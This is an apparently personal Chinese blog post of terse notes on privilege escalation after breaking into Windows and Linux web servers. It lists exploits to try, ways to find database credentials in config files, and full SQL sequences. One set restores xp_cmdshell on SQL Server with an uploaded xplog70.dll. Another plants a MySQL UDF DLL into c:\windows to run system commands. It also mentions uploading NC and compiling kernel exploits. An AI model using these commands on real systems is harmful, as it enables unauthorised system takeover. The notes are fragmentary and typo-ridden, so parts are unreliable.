提权

优先顺序:本地提权-应用提权-数据库提权

在windows中guest和User用户不能登陆3389

poweruser可以登陆3389

LINUX 只有内核提权

tasklist

提权

1.windows提权（RECYCLER目录可读）

将cmd.exe传到RECYCLER里面

ipconfig

whoami

netstat

systeminfo

net user

要开3389端口

查看这两个漏洞添加可远程登陆用户

ms13052 （不稳定不一定可以成功）

ms11080 kb259799 (win7 2008也有） 26 27

ms11080.exe gats都是用户名

巴西烤肉

10015

10048

添加pwd那两个文件到recycle里面） 密码破解工具   ntlm站点 hash.craker.com

library.dll复制到system32李米娜

在cmd里面执行那个可执行文件

2.linux提权（内核本地提权，内核本地溢出）

3.数据库提权

access不能提权

SQLSERVER sa的用户才可以提权

mysql root权限才能提权,而且只能在Windows操作系统中提权。

oracle system权限才能提权（不需要提权）

sysbase

asp网站     user权限

asp.net网站 poweruser权限

php网站     在windows里面system权限（应为安装apache要用system权限）

           在LINUX里面普通管理员权限

jsp         在windows和Linux里面都是最高权限

linux       如果装tomecate或java就是system权限，其它是普通权限。apache默认没有密码。

1.找数据库连接账户和密码

 php asp目录（Inc data conn）中找连接池文件（data.asp ,config.asp，conn.asp）

 asp.net在web.config目录中 JDBC

 java保存在web_info文件夹里面。

用SQLtools连接

未能执行存储过程，就要在PPT里面找那个xp_cmdshell的那个文件考过来

dbcc addextendedproc ("sp_oacreate","odsole70.dll")

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢复存储过程恢复不成功，就上传xplog70.dll到目录

如果提示Error Message:无法装载 DLL C:\Inetpub\testweb\xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。

则先执行

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'

dbcc addextendedproc ("xp_cmdshell",“XXXX/xplog70.dll")

然后上传"xplog70.dll"到一个可以访问的目录，或者扔到回收站，然后执行

dbcc addextendedproc ("xp_cmdshell","c:\recycel\xplog70.dll")

Mysql提权

1.需要root权限，但只能在windows中。安装是system权限，也可能被降为user权限，进去再shell中whoami查看，到那时要提权。

2.如果在Linux中，不能提权。是apache组。

func反弹 可能会造成假死，一般不同

udf直连  udf是一个模块，需要udf.dll。把udf.dll上传到windows目录c:/windows中，将其注册后从而执行cmdshell。

先放udp.php到回收站，然后用Mysql写入表，然后再把表导入windows里面。

create table cdb_mix(abc longblob);

insert into cdb_mix values(load_file('c:\\RECYCLER\\ma.dll'));

select * from cdb_mix into dumpfile 'c:\\windows\\md.dll';

create function cmdshell returns string soname 'ma.dll';

select cmdshell('net user');

drop table if exists cdb_mix;

4.应用提权

serv-U  system  

43958

的安装目录

linux拿ROOT权限

linux传NC的那个码

linux提权点击链接，复制链接到cmd里面，点开始链接

传full.的码到temp目录下

cd /tmp

uname -a

gcc -w xxx -o 121

___________________________________________________________________________

同url，不同参数的算一个

超过3个sql注入或跨站，就写大量的sql注入或跨站。

大量的sql注入，列举三个。

本文出自 “无双城” 博客，谢绝转载！